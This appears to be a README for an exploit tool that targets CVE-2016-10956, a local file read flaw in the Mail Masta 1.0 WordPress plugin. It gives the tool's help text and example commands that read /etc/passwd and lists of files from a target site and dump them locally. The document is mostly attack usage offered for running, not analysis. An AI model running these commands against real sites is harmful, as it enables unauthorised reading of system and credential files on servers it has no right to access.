The mail-masta plugin 1.0 for WordPress has local file read in count_of_send.php
and csvexport.php
.
$ ./CVE-2016-10956_mail_masta.py -h
[+] Mail Masta - Local File Read (CVE-2016-10956)
usage: CVE-2016-10956_mail_masta.py [-h] [-v] [-s] -t TARGET_URL [-f FILE | -F FILELIST] [-D DUMP_DIR] [-k] [-r]
Description message
optional arguments:
-h, --help show this help message and exit
-v, --verbose Verbose mode
-s, --only-success Only print successful read file attempts.
-t TARGET_URL, --target TARGET_URL
URL of the wordpress to connect to.
-f FILE, --file FILE Remote file to read.
-F FILELIST, --filelist FILELIST
File containing a list of paths to files to read remotely.
-D DUMP_DIR, --dump-dir DUMP_DIR
Directory where the dumped files will be stored.
-k, --insecure Allow insecure server connections when using SSL (default: False)
-r, --raw Raw dump of the file without php base64 wrapper (default: False)
./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -f /etc/passwd
./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -F wordlist
./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -F wordlist --only-success